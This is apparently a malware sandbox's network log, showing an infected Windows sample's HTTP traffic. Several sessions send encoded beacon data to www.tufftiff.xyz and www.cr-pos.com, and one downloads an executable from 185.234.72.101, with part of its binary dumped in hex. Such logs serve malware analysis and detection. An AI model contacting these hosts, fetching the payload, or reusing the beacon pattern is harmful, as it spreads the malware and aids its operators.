0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:25:36.662818909 CEST219INData Raw: 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69
                                                  Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  20192.168.2.764475192.250.231.28806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:38.686378002 CEST453OUTGET /b9jt/?FTP84=I6wqk3vZ0MIwducyeDc5a1RUJrCEqnXhmjD4iKeo+QzF3CVziIh9NSuBhJSHyIOtb6QEc0JQU3wLuke4KM9e0eKAxB2ADTUoySVeubTpqpeKSrgjLWx1k8qzQ8FFILh8qZ99MFd/cRWi&Lb=GFtlIrHx8T50 HTTP/1.1
                                                  Host: www.cr-pos.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:25:39.206994057 CEST1236INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  X-Powered-By-Plesk: PleskWin
                                                  Date: Mon, 01 Jul 2024 17:25:39 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:25:39.207015991 CEST219INData Raw: 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69
                                                  Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  21192.168.2.764476162.0.238.43806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:52.990557909 CEST716OUTPOST /vwgn/ HTTP/1.1
                                                  Host: www.tufftiff.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.tufftiff.xyz
                                                  Referer: http://www.tufftiff.xyz/vwgn/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 30 73 32 73 44 69 76 53 30 68 47 4b 46 66 6f 65 49 55 78 31 52 42 36 72 58 4d 49 37 65 61 78 58 5a 74 57 49 33 46 76 58 47 59 49 78 7a 56 71 62 6a 52 68 4a 7a 64 4a 56 54 4b 4c 45 63 38 69 38 74 6e 7a 70 71 78 61 63 53 44 59 6f 4b 49 34 58 57 47 62 6a 53 6c 55 37 6d 2f 67 55 37 79 34 4b 7a 36 64 39 47 58 5a 52 44 47 49 74 64 58 33 2b 63 70 65 54 2b 53 6d 51 4a 74 2f 47 48 7a 79 6a 46 77 38 6a 4d 4f 56 4e 2f 34 53 72 32 4a 46 4e 59 64 6f 55 53 50 30 42 69 2b 45 51 69 34 48 4a 52 77 2b 30 63 59 75 54 54 4d 30 62 41 63 6f 32 42 64 36 33 31 74 32 2f 32 36 2b 72 41 6a 63 6f 30 62 43 32 6a 78 50 64 4b 58 6c 58 65 4f 75 6d 71 51 3d 3d
                                                  Data Ascii: FTP84=0s2sDivS0hGKFfoeIUx1RB6rXMI7eaxXZtWI3FvXGYIxzVqbjRhJzdJVTKLEc8i8tnzpqxacSDYoKI4XWGbjSlU7m/gU7y4Kz6d9GXZRDGItdX3+cpeT+SmQJt/GHzyjFw8jMOVN/4Sr2JFNYdoUSP0Bi+EQi4HJRw+0cYuTTM0bAco2Bd631t2/26+rAjco0bC2jxPdKXlXeOumqQ==
                                                  Jul 1, 2024 19:25:53.602468014 CEST533INHTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:53 GMT
                                                  Server: Apache
                                                  Content-Length: 389
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  22192.168.2.764477162.0.238.43806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:55.524468899 CEST736OUTPOST /vwgn/ HTTP/1.1
                                                  Host: www.tufftiff.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.tufftiff.xyz
                                                  Referer: http://www.tufftiff.xyz/vwgn/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 30 73 32 73 44 69 76 53 30 68 47 4b 58 76 34 65 59 44 6c 31 41 78 36 6f 63 73 49 37 58 36 78 62 5a 74 61 49 33 48 44 2b 47 75 59 78 7a 30 61 62 73 30 4e 4a 77 64 4a 56 59 71 4c 64 59 38 69 33 74 6e 4f 4a 71 31 61 63 53 44 38 6f 4b 4a 49 58 57 33 62 67 51 31 55 75 76 66 67 4b 31 53 34 4b 7a 36 64 39 47 58 64 37 44 48 67 74 64 47 48 2b 63 49 65 4d 67 43 6d 58 4f 74 2f 47 44 7a 79 6e 46 77 39 32 4d 4c 31 33 2f 37 71 72 32 49 31 4e 5a 4d 6f 56 62 50 31 4b 6d 2b 46 54 73 5a 47 44 62 42 53 71 46 72 32 51 64 2b 38 66 4d 4b 31 55 62 2f 32 62 72 38 4f 45 79 34 61 64 58 46 42 64 32 61 47 75 75 54 37 38 56 67 41 39 54 63 50 69 38 75 4e 53 5a 77 50 41 68 51 6d 6d 39 51 54 42 53 77 72 30 39 2b 73 3d
                                                  Data Ascii: FTP84=0s2sDivS0hGKXv4eYDl1Ax6ocsI7X6xbZtaI3HD+GuYxz0abs0NJwdJVYqLdY8i3tnOJq1acSD8oKJIXW3bgQ1UuvfgK1S4Kz6d9GXd7DHgtdGH+cIeMgCmXOt/GDzynFw92ML13/7qr2I1NZMoVbP1Km+FTsZGDbBSqFr2Qd+8fMK1Ub/2br8OEy4adXFBd2aGuuT78VgA9TcPi8uNSZwPAhQmm9QTBSwr09+s=
                                                  Jul 1, 2024 19:25:56.120687962 CEST533INHTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:56 GMT
                                                  Server: Apache
                                                  Content-Length: 389
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  23192.168.2.764478162.0.238.43806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:58.058517933 CEST1749OUTPOST /vwgn/ HTTP/1.1
                                                  Host: www.tufftiff.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.tufftiff.xyz
                                                  Referer: http://www.tufftiff.xyz/vwgn/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 30 73 32 73 44 69 76 53 30 68 47 4b 58 76 34 65 59 44 6c 31 41 78 36 6f 63 73 49 37 58 36 78 62 5a 74 61 49 33 48 44 2b 47 75 51 78 7a 43 75 62 74 58 56 4a 78 64 4a 56 56 4b 4c 41 59 38 69 71 74 6e 6d 57 71 31 65 6d 53 46 34 6f 4a 72 41 58 65 6c 7a 67 61 31 55 75 69 2f 67 58 37 79 34 62 7a 2b 42 35 47 58 74 37 44 48 67 74 64 46 66 2b 56 35 65 4d 69 43 6d 51 4a 74 2f 61 48 7a 79 44 46 77 30 42 4d 4c 35 6e 2f 4c 4b 72 31 72 64 4e 55 65 77 56 55 50 31 49 71 65 46 78 73 63 65 41 62 46 4b 49 46 6f 71 32 64 2b 30 66 4f 65 34 52 48 4d 32 42 36 38 65 4b 35 70 4b 6a 52 6b 70 4e 35 59 4b 32 78 44 48 7a 5a 78 63 37 4c 2b 6d 75 36 62 41 2b 47 48 48 7a 73 55 4f 50 78 57 6d 73 4a 44 47 75 6c 59 4e 69 64 36 6c 43 79 63 4f 33 33 71 47 64 39 53 73 37 4f 48 4c 34 70 62 6e 52 6c 76 46 78 64 58 72 2f 77 41 67 7a 58 75 6f 6c 44 35 58 54 7a 32 59 43 6c 50 65 56 4c 55 48 34 75 66 2f 35 39 41 75 6d 6c 76 6e 49 68 7a 53 69 2f 6c 50 44 39 74 75 7a 2f 2b 35 52 38 37 6e 33 30 45 6c 33 64 58 61 2f 6f 72 57 34 [TRUNCATED]
                                                  Data Ascii: FTP84=0s2sDivS0hGKXv4eYDl1Ax6ocsI7X6xbZtaI3HD+GuQxzCubtXVJxdJVVKLAY8iqtnmWq1emSF4oJrAXelzga1Uui/gX7y4bz+B5GXt7DHgtdFf+V5eMiCmQJt/aHzyDFw0BML5n/LKr1rdNUewVUP1IqeFxsceAbFKIFoq2d+0fOe4RHM2B68eK5pKjRkpN5YK2xDHzZxc7L+mu6bA+GHHzsUOPxWmsJDGulYNid6lCycO33qGd9Ss7OHL4pbnRlvFxdXr/wAgzXuolD5XTz2YClPeVLUH4uf/59AumlvnIhzSi/lPD9tuz/+5R87n30El3dXa/orW4EfaxhNIoAYOFJx2uBL6U3KtG9csCvg7GvnsrSyKoLo0eoiqPhT59auCApjGHzmfEMu0txFrx23f3fwsZ+Ui4deiQW6FQ3+YmiZPF+7RQ5jMHsxmZoBP6Qr9sQzjMdVIks20TdqlYKpP6827tJ+5VdAu3vZY+WT/ceUPX1l9pw47R0im1J2z3HGni5dWfpJ+pmp5HSDxGq6iglGWammHSzUYPS/sQV/wCy1zskHFi8j6vL90U70nQj23mDi0leV52q9kmgwXwpsbz0z8u3vBjuYvQ0jVdm7zlqGA7Tm/1DM1T+Fz7S0aIwDUBIhfZFQIsU9iQHVhOTyl5hE2rsT+rsNQN/YqWfVBawpcf6LgJ9mghR/9ImhKhd4mzVbtWVirJZFIc+5vH+BrOhx90DgHey1mM3fcNNAWYppQ+zZOyazkock5zZbU48lqdaX+uq5u9lpqMqgyccCOiPG0NDyMrXjI7DV1qSdoO3avtiXBfBwaDPGcUKOrIw+JPRqiuFUQ39Ien5ZYXjgx1Nx5i1W9VsmgssZnRTczMcZZEFjVUpYM7HtEJDvbkJIgJeZXXeffUguy+KV0MScy3e2wI+0Jf3z127zsncbjQmsOQ4JTKXifr3ktj48U4KjmVHp7ANF9TvVbYeheYN/ILa+jLrnWQEAE0NCg+/HiJoc [TRUNCATED]
                                                  Jul 1, 2024 19:25:58.759198904 CEST533INHTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:58 GMT
                                                  Server: Apache
                                                  Content-Length: 389
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  24192.168.2.764479162.0.238.43806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:00.592495918 CEST455OUTGET /vwgn/?FTP84=5ueMAWSl8HCdHaQ4ISZ1AQXhc5gyPvE6M+De+X7bZoAB9UCIok5O2fARcoTif8zUuE/VgVKiECkkSJ85U3W5QFFnp/YrlC4tzeltTmpoeWoUEn2HXZmMuQrIM+LIMwiHVH8SJcx756eW&Lb=GFtlIrHx8T50 HTTP/1.1
                                                  Host: www.tufftiff.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:26:01.205409050 CEST250INHTTP/1.1 200 OK
                                                  Date: Mon, 01 Jul 2024 17:26:01 GMT
                                                  Server: Apache
                                                  Vary: Accept-Encoding
                                                  Content-Length: 76
                                                  Connection: close
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 37 75 43 57 64 47 71 32 35 52 61 44 56 36 45 42 49 6e 6b 45 57 6c 50 37 50 73 5a 61 50 50 4d 37 4c 4c 50 55 75 51 75 34 5a 76 67 77 79 46 79 76 72 58 51 74 7a 74 59 65 4c 5a 2b 38 58 35 6a 44 70 56 50 45 76 79 69 37 65 41 3d 3d
                                                  Data Ascii: 7uCWdGq25RaDV6EBInkEWlP7PsZaPPM7LLPUuQu4ZvgwyFyvrXQtztYeLZ+8X5jDpVPEvyi7eA==


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  25192.168.2.764480185.234.72.101807640C:\Windows\SysWOW64\chkntfs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:05.837033033 CEST195OUTGET /EuOdzX7Ehz6t1H3.exe HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: 185.234.72.101
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Jul 1, 2024 19:26:06.499651909 CEST1236INHTTP/1.1 200 OK
                                                  Date: Mon, 01 Jul 2024 17:26:06 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Last-Modified: Thu, 27 Jun 2024 06:51:42 GMT
                                                  ETag: "aaa00-61bd9903d370d"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 698880
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-msdownload
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 20 ef 82 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a0 0a 00 00 08 00 00 00 00 00 00 be bf 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c bf 0a 00 4f 00 00 00 00 c0 0a 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0a 00 0c 00 00 00 40 9e 0a 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL 0 @ @lO@p H.text `.rsrc@@.reloc@BH,l@rps}}((*0{orp{so+{ooo&o-{o{orp{so8{orpo o!rp%oo"&{orpo o!rp%oo"&{orpo o!
                                                  Jul 1, 2024 19:26:06.499721050 CEST1236INData Raw: 72 c5 01 00 70 17 8d 18 00 00 01 25 16 09 18 6f 1b 00 00 0a a2 6f 22 00 00 0a 26 02 7b 04 00 00 04 6f 1f 00 00 0a 72 93 01 00 70 6f 20 00 00 0a 6f 21 00 00 0a 72 d5 01 00 70 17 8d 18 00 00 01 25 16 09 19 6f 1b 00 00 0a a2 6f 22 00 00 0a 26 02 7b
                                                  Data Ascii: rp%oo"&{orpo o!rp%oo"&{orpo o!rp%oo"&o:{o*0k{orp{so#rCp{o$o%&o8
                                                  Jul 1, 2024 19:26:06.499758959 CEST1236INData Raw: 20 60 01 00 00 73 3d 00 00 0a 6f 4c 00 00 0a 00 02 7b 04 00 00 04 16 6f 3f 00 00 0a 00 02 7b 04 00 00 04 72 ad 02 00 70 6f 29 00 00 0a 00 02 7b 05 00 00 04 28 36 00 00 0a 6f 37 00 00 0a 00 02 7b 05 00 00 04 6f 38 00 00 0a 02 7b 06 00 00 04 6f 39
                                                  Data Ascii: `s=oL{o?{rpo){(6o7{o8{o9{o8{o9{o8{o9{o8{o9{o8{o9{o8{o9{o8{o9{o8{o9
                                                  Jul 1, 2024 19:26:06.499798059 CEST672INData Raw: 00 04 1f 0b 6f 3f 00 00 0a 00 02 7b 0e 00 00 04 17 6f 51 00 00 0a 00 02 7b 0e 00 00 04 20 47 02 00 00 20 a5 00 00 00 73 3a 00 00 0a 6f 3b 00 00 0a 00 02 7b 0e 00 00 04 72 bd 03 00 70 6f 3c 00 00 0a 00 02 7b 0e 00 00 04 1f 5a 1f 1d 73 3d 00 00 0a
                                                  Data Ascii: o?{oQ{ G s:o;{rpo<{Zs=o>{o?{rpo){ xs:o;{rpo<{ %s=o>{o?{oQ{ Gxs:o;{r
                                                  Jul 1, 2024 19:26:06.499835014 CEST1236INData Raw: 02 7b 09 00 00 04 1f 0f 6f 3f 00 00 0a 00 02 7b 09 00 00 04 72 65 04 00 70 6f 29 00 00 0a 00 02 7b 08 00 00 04 17 6f 51 00 00 0a 00 02 7b 08 00 00 04 20 c1 01 00 00 20 d2 00 00 00 73 3a 00 00 0a 6f 3b 00 00 0a 00 02 7b 08 00 00 04 72 77 04 00 70
                                                  Data Ascii: {o?{repo){oQ{ s:o;{rwpo<{s=o>{o?{repo){oQ{ s:o;{rpo<{s=o>{o?{rep
